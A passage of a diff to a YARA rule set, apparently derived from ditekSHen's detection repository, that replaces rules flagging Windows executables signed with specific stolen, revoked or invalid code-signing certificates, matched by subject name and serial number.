+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3F8B1D4C656982A34435F971C9F3C301 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B61B8E71514059Adc604Da05C283E514 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "7bafe9c8-7ec5-5847-81dc-2f2d0753f784"
+		id = "d52bd370-a1da-56f1-8edd-da61c9e2e75b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5296-L5307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L133-L144"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "95fd60c5f236b06fca308696dfe3e3aeb3aa6f255c6030d44822dc33a7c4c917"
+		logic_hash = "b771d40e4e2db1d3f26d8fb2fa140f57871712700e584005d2377b701fc9538a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f12a12ac95e5c4fa9948dd743cc0e81e46c5222e"
+		thumbprint = "67ee69f380ca62b28cecfbef406970ddd26cd9be"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Word" and pe.signatures [ i ] . serial == "3f:8b:1d:4c:65:69:82:a3:44:35:f9:71:c9:f3:c3:01" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ef9D0Cf071D463Cd63D13083046A7B8D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_51Cd5393514F7Ace2B407C3Dbfb09D8D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f4b83bdf-ce07-5bad-b3e2-2c192d67f9f1"
+		id = "f2f7b08e-111c-570b-b376-79145050ca42"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5309-L5320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L146-L157"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9cf4ee1b3000d96d419bfd3e9ac3fb07f843aed735582c72e3a9799e2a56e364"
+		logic_hash = "389dbdc85035fdd94e831940eda910349134600e921720729840c932123db36d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "346849dfdeb9bb1a97d98c62d70c578dacbcf30c"
+		thumbprint = "07a9fd6af84983dbf083c15983097ac9ce761864"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E1E7E596F8F5Ccbeed4Ab882B6Cfe6Ce : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_030012F134E64347669F3256C7D050C5 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "063d70e1-06b0-53f6-8edb-c81c89af0a05"
+		id = "7f16b535-8a0f-583d-8bc3-0abf24f26632"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5322-L5333"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L159-L170"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "56977d47d8fcfd5eb7b5b4a141a9465e1cd2c497f05e61854e0ab09e2c7065a0"
+		logic_hash = "68bfd2e146e3b2bd1222de7f9981bb0e373bcb4727a81eb7060af36e6275d438"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4fec400152db868b07f202fd76366332aedc7b78"
+		thumbprint = "959caa354b28892608ab1bb9519424c30bebc155"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LnvNzpvYjsjJOwcvwfalIvRAJHVApnpJU" and pe.signatures [ i ] . serial == "00:e1:e7:e5:96:f8:f5:cc:be:ed:4a:b8:82:b6:cf:e6:ce" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_047801D5B55C800B48411Fd8C320Ca5B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B7F19B13De9Bee8A52Ff365Ced6F67Fa : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "750b5b0d-7752-5407-a29e-3272b764a276"
+		id = "b9cbe1bd-b24f-5599-a8b9-9e6f9b70f37f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5335-L5346"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L172-L183"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e64b59f3d7f7554a482eaa32f5eac80f289bf57865a21381a3c1c78b1dabcab"
+		logic_hash = "afdc41aed0480593bb8c92955db044ebe1a695d4912176123e26e052a3e9d3ea"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "00c49b8d6fd7d2aa26faad8e5a31f93a15d66d09"
+		thumbprint = "61708a3a2bae5343ff764de782d7f344151f2b74"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Ceb6B2Eec12934A64F75A4592159F084 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4C8Def294478B7D59Ee95C61Fae3D965 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a37bf0a2-3205-515c-9957-374108e199e9"
+		id = "2f95a688-2fb2-55b7-9cd5-44586d6d4dc8"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5366-L5377"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L185-L196"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3e4aa8d970ead42bf1abb36a922ef31ac1b1aa308944cf099d6bbfb50e07c588"
+		logic_hash = "d9e956d7d5b9389aebafd4b7025818ac8eb5a72aaa1b94068a12aa7a8029f97c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ccd30b68e37fc177b754250767a16062a711310a"
+		thumbprint = ""
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "ce:b6:b2:ee:c1:29:34:a6:4f:75:a4:59:21:59:f0:84" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6B6739E55F3F25B147C4A6767De41F57 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0A23B660E7322E54D7Bd0E5Acc890966 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ee84787b-cc90-545d-8e15-bf84676f222c"
+		id = "c9817cbd-edce-5ae0-ad70-58d592ac415f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5379-L5391"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L198-L209"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "da0921c1e416b3734272dfa619f88c8cd32e9816cdcbeeb81d9e2b2e8a95af4c"
-		logic_hash = "9d1a20f3dfa6c31ed557e531f7a57c64032e518c033993234849882ef769fcbd"
+		logic_hash = "6b9009d0c509b38107eba5742613f8ec6f48e447225c664e374ef56d64b035f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "07a09d3d3c05918519d6f357fe7eed5e1d529f22"
+		thumbprint = "c1e0c6dc2bc8ea07acb0f8bdb09e6a97ae91e57c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avast Antivirus SEC" and pe.signatures [ i ] . serial == "6b:67:39:e5:5f:3f:25:b1:47:c4:a6:76:7d:e4:1f:57" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B97F66Bb221772Dc07Ef1D4Bed8F6085 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_04332C16724Ffeda5868D22Af56Aea43 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c0797751-d03c-59c7-a02a-27e6f466bd96"
+		id = "7e6be2f5-2f34-5337-8beb-4ccc6c50ad2d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5393-L5404"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L211-L222"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e68f6ebbeadc9381c2888abf77e040f27648a40d770524830f8a49fe2d11534f"
+		logic_hash = "338e7d9374de04d00162c9caf86d922f4d659b024ae7908f0e02ca4709a14a1d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fb4efb3bfcef8e9a667c8657f2e3c8fb7436666e"
+		thumbprint = "cba350fe1847a206580657758ad6813a9977c40e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Cc95D6Ebf18A3711E196Aea210465A19 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_085B70224253486624Fc36Fa658A1E32 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "bd6957ac-d5e0-5e77-87b3-a62c442f7f72"
+		id = "8d0f4499-1ed2-5277-be80-0b7f3499b360"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5406-L5417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L224-L235"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "640ba6d64ad7e0791ef29d3ee9387e0944826f22f01a6a01486f6b3ac4138826"
+		logic_hash = "8779cca652b366ce33a3735069fdc35657a6bed5b469a956cd236d76901f8f54"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "319f0e03f0f230629258c7ea05e7d56ead830ce9"
+		thumbprint = "36834eaf0061cc4b89a13e019eccc6e598657922"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GEN Sistemi, d.o.o." and pe.signatures [ i ] . serial == "00:cc:95:d6:eb:f1:8a:37:11:e1:96:ae:a2:10:46:5a:19" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Dde89C647Dc2138244228040E324Dc77 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0086E5A9B9E89E5075C475006D0Ca03832 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "5008d334-964a-516b-895e-761ae94e5bd4"
+		id = "898bfe5f-5ac6-51f3-be55-09279a286835"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5419-L5430"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L237-L248"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6c11a277f855ad8a4b235e1461ad024c4490d04530b91ecb47c8fcf8dee1239"
+		logic_hash = "613f21989dc369ef6b1d8e42a0d707810ef064c608e4e34ba5eb475164f14abc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1d9aaa1bc7d6fc5a76295dd1cf692fe4a1283f04"
+		thumbprint = "76f6c507e0bcf7c6b881f117936f5b864a3bd3f8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "dd:e8:9c:64:7d:c2:13:82:44:22:80:40:e3:24:dc:77" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_039668034826Df47E6207Ec9Daed57C3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8f7d0337-7840-5c6e-b562-dbaef1a7c022"
+		id = "8ae5f710-db8e-5d29-b247-a103f0878aa5"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5432-L5443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L250-L261"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26690cb1ef7eb9b7009376b4c2a30505f01184f4462478f65379372e84e02bc8"
+		logic_hash = "b9579ba5dac45e38ef7b2b3381d1651395a4f648c68ae8e6fc36a0ea2d9b6300"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4bc67aca336287ff574978ef3bf67c688f6449f2"
+		thumbprint = "f98bdfa941ebfa2fe773524e0f9bbe9072873c2f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4E7545C9Fc5938F5198Ab9F1749Ca31C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_736Dcfd309Ea4C3Bea23287473Ffe071 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "af27fbf7-f4e2-59e9-8b2b-b353704ce9d6"
+		id = "058c4e85-e004-5fe0-9e16-9dbe333371f6"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5445-L5456"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L263-L274"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b7bc07622ad3f7ec77f4bb0d51350c82734af4b73a26ecd21955e55e99bb515"
+		logic_hash = "68a91e0e042606d49a5c83c972b0a6bf387c9d7d20c2df132edec717ab4603a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7a49677c535a13d0a9b6deb539d084ff431a5b54"
+		thumbprint = "8bfc13bf01e98e5b38f8f648f0f843b63af03f55"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESTELLA, OOO" and pe.signatures [ i ] . serial == "73:6d:cf:d3:09:ea:4c:3b:ea:23:28:74:73:ff:e0:71" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_040F11F124A73Bdecc41259845A8A773 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_09C89De6F64A7Fdf657E69353C5Fdd44 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0502773a-356e-5eae-9c37-e1ef89de3547"
+		id = "613c4253-8a53-5faa-8376-10c9a35805cf"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5458-L5469"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L276-L287"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70edbe8be481ccb7b5c6a6485c2ac249ec5120a4cde18d551954cfeaae121f27"
+		logic_hash = "7fcb517a4160226cf89c13b5b27310d1e8a02d3f164a338a8d2901ef604f1d8a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6f332f7e78cac4a6c35209fde248ef317f7a23e8"
+		thumbprint = "7ad763dfdaabc1c5a8d1be582ec17d4cdcbd1aeb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TrustPort" and pe.signatures [ i ] . serial == "04:0f:11:f1:24:a7:3b:de:cc:41:25:98:45:a8:a7:73" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1B1E87E90519D7273C0033Bf489B798F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_03B630F9645531F8868Dae8Ac0F8Cfe6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b154ae08-108c-5980-a611-5e086877af2a"
+		id = "ca5203b8-3029-5914-b611-1717aefc7ccf"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5471-L5483"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L289-L300"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "84cef0aed269e6213bfa213d95a3db625bcdde130f33bf4227436985e4473252"
-		logic_hash = "b47f80ecc895e73d69c60a5e88d6a6c95fcb9bddb30f14a1421b68aabc2290c9"
+		logic_hash = "0c388ee7cfc2f35d5e020520d0c5a04b872d5deff63fc551308168e60122f7fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef09824554f85603c9ffb1cecbfe06ae489a9583"
+		thumbprint = "ab027825daf46c5e686e4d9bc9c55a5d8c5e957d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBIS, OOO" and pe.signatures [ i ] . serial == "1b:1e:87:e9:05:19:d7:27:3c:00:33:bf:48:9b:79:8f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00D9E834182Dec62C654E775E809Ac1D1B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_020Bc03538Fbdc792F39D99A24A81B97 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ce1640b7-6631-5e8f-a2df-0716b2f86b99"
+		id = "d5fd84b4-cccf-569d-96ea-26d9d21c6adf"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5485-L5497"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L302-L313"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "645dbb6df97018fafb4285dc18ea374c721c86349cb75494c7d63d6a6afc27e6"
-		logic_hash = "3e7ca9aec19f118c7a143826838244f3f8d0a603a44980522f5227a9c3a82a88"
+		logic_hash = "154d7d814ff0b1c2d85557211dd68d0bd82e9953a9912ac3c26475a1316b0cb3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5bb983693823dbefa292c86d93b92a49ec6f9b26"
+		thumbprint = "0ab2629e4e721a65ad35758d1455c1202aa643d3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLOBAL PARK HORIZON SP Z O O" and pe.signatures [ i ] . serial == "02:0b:c0:35:38:fb:dc:79:2f:39:d9:9a:24:a8:1b:97" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ced87Bd70B092Cb93B182Fac32655F6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4E8D4Fc7D9F38Aca1169Fbf8Ef2Aaf50 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "5e716e70-0c78-5194-9134-0ee140221610"
+		id = "03a23987-bbec-5072-bea4-56773bdc7d53"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5499-L5511"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L315-L326"
